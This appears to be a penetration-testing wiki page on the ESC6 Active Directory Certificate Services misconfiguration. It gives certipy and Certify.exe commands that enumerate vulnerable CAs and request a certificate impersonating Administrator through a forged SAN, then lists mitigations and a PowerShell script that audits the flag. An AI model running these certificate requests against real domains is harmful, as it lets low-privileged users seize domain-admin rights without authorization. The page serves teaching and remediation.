# ESC6

## Description <a href="#description" id="description"></a>

ESC6 occurs when a Certificate Authority (CA) has the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag enabled in its configuration. This flag allows certificate requesters to specify arbitrary Subject Alternative Name (SAN) values. If Microsoft’s May 2022 security update for [CVE-2022-26923](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26923) has not been applied, the CA may be vulnerable to privilege escalation.

Under these conditions, any certificate template that supports Client Authentication and is enrollable by low-privileged users becomes a potential attack vector. This makes ESC6 similar in effect to ESC1, as an attacker can request a certificate with a forged SAN, impersonating a privileged user. Even the default "User" template could be exploited in this manner, allowing a standard domain user to escalate to a domain administrator.

### Requirements for attack path <a href="#requirements-for-attack-path" id="requirements-for-attack-path"></a>

The attack path requires all of the following conditions:

* The CA has the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set.
* The security patch for CVE-2022-26923 has not been applied to the CA.
* Access to an account that is permitted to enroll in a template which also supports Client Authentication (the default "User" template is sufficient in most cases).

## Linux

### Enumeration

{% code overflow="wrap" %}

```bash
certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.231.141 -vulnerable -stdout
```

{% endcode %}

<figure><img src="/files/Ef8pzLhDekaxG1chlGDZ" alt=""><figcaption></figcaption></figure>

### Performing the attack

{% code overflow="wrap" %}

```bash
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.231.141 -ca lab-LAB-DC-CA -template User -upn Administrator@lab.local
```

{% endcode %}

<figure><img src="/files/aisaBXTNddSZlByERnQR" alt=""><figcaption></figcaption></figure>

Once the certificate is retrieved, we can follow the remainder of the steps as per ESC1.

{% content-ref url="/pages/swG25gAd15pb2tOyNaEx" %}
[ESC1](/pentest-everything/everything/everything-active-directory/adcs/esc1.md)
{% endcontent-ref %}

## Windows

### Enumeration

Certify can be used to check the Certificate Authorities for the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag.

```powershell
.\Certify.exe cas
```

<figure><img src="/files/tDBJdH654ma7SWmdo7bJ" alt=""><figcaption></figcaption></figure>

### Performing the attack

The steps to perform the attack are almost identical to ESC1, except that we pick the default "User" template (or any other candidate template, if required).

{% code overflow="wrap" %}

```powershell
.\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:User /altname:Administrator
```

{% endcode %}

<figure><img src="/files/go5y8aYDdNcLasyPl5G6" alt=""><figcaption></figcaption></figure>

After retrieval, we can follow the remainder of the steps within ESC1 to complete the attack.

{% content-ref url="/pages/swG25gAd15pb2tOyNaEx" %}
[ESC1](/pentest-everything/everything/everything-active-directory/adcs/esc1.md)
{% endcontent-ref %}

## Mitigations

* Remove the flag `EDITF_ATTRIBUTESUBJECTALTNAME2` from the Certificate Authority.

Run the following on the Certificate Authority as a Domain Administrator.

```
certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
```

After doing so, restart the Certificate Services service (`certsvc`) so the change takes effect.

```
net stop certsvc & net start certsvc
```
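To confirm the flag state before and after remediation (and to turn the "flag enabled" condition from the Description into a concrete check), the following PowerShell audit is an added example; it is not code from the original page, nor from Certify or Certipy. It assumes it is run locally on the CA host with administrative rights and that the CA uses the default Microsoft policy module, so that `EditFlags` is stored under `HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA name>\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy`. That registry path and the bit value `0x40000` for `EDITF_ATTRIBUTESUBJECTALTNAME2` are standard Windows values rather than values taken from this page; the function names `Test-Esc6EditFlag` and `Get-CaEditFlagStatus` are this example's own.

```powershell
# Added example, not code from the original page or from Certify/Certipy.
# Audits every CA configured on this host for the EDITF_ATTRIBUTESUBJECTALTNAME2
# edit flag (the ESC6 pre-condition) and reports the result per CA.
# Assumptions: run locally on the CA with administrative rights; the CA uses the
# default Microsoft policy module, so EditFlags lives under
#   HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA name>\
#     PolicyModules\CertificateAuthority_MicrosoftDefault.Policy
# Function and variable names are this example's own.

# Bit value of EDITF_ATTRIBUTESUBJECTALTNAME2 within the EditFlags DWORD.
$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

function Test-Esc6EditFlag {
    param(
        # Accepts an EditFlags value read from anywhere (registry, or the number
        # shown by "certutil -getreg policy\EditFlags") and tests the single bit.
        [Parameter(Mandatory)][int]$EditFlags
    )
    return (($EditFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) -ne 0)
}

function Get-CaEditFlagStatus {
    $configRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'
    if (-not (Test-Path -Path $configRoot)) {
        throw 'No Certificate Services configuration found on this host.'
    }

    foreach ($ca in Get-ChildItem -Path $configRoot) {
        $policyKey = Join-Path -Path $ca.PSPath -ChildPath 'PolicyModules\CertificateAuthority_MicrosoftDefault.Policy'
        # Skip subkeys that are not a CA using the default policy module.
        if (-not (Test-Path -Path $policyKey)) { continue }

        $editFlags = (Get-ItemProperty -Path $policyKey -Name EditFlags -ErrorAction Stop).EditFlags
        $flagSet   = Test-Esc6EditFlag -EditFlags $editFlags

        [pscustomobject]@{
            CAName     = $ca.PSChildName
            EditFlags  = ('0x{0:X} ({1})' -f $editFlags, $editFlags)
            SanFlagSet = $flagSet
            Status     = $(if ($flagSet) { 'AT RISK: EDITF_ATTRIBUTESUBJECTALTNAME2 is set' } else { 'OK' })
        }
    }
}

Get-CaEditFlagStatus | Format-Table -AutoSize
```

Run the script once before applying the `certutil -setreg` command above and again after restarting `certsvc`; `SanFlagSet` should change from `True` to `False`. `Test-Esc6EditFlag` can also be fed a value copied from `certutil -getreg policy\EditFlags` output on a remote CA, for example `Test-Esc6EditFlag -EditFlags 0x15014e` returns `True` while the stock Enterprise CA value `0x11014e` returns `False`, since the two differ only in the `0x40000` bit.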

